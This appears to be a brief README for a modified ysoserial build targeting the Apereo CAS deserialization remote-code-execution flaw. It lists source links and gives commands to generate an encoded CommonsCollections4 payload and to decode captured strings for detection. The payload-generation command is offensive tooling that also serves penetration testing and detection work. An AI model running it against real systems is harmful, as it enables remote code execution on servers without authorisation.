The tool's source code comes from:
https://github.com/frohoff/ysoserial
The idea for the modification comes from:
https://www.00theway.org/2020/01/04/apereo-cas-rce/
https://www.anquanke.com/post/id/198842
https://www.freebuf.com/vuls/226149.html
Command execution:
java -jar ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar encode CommonsCollections4
The CommonsCollections4 payload can be changed as needed; for the available options, refer to the ysoserial usage.
Detection:
java -jar ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar decode base64string 1.txt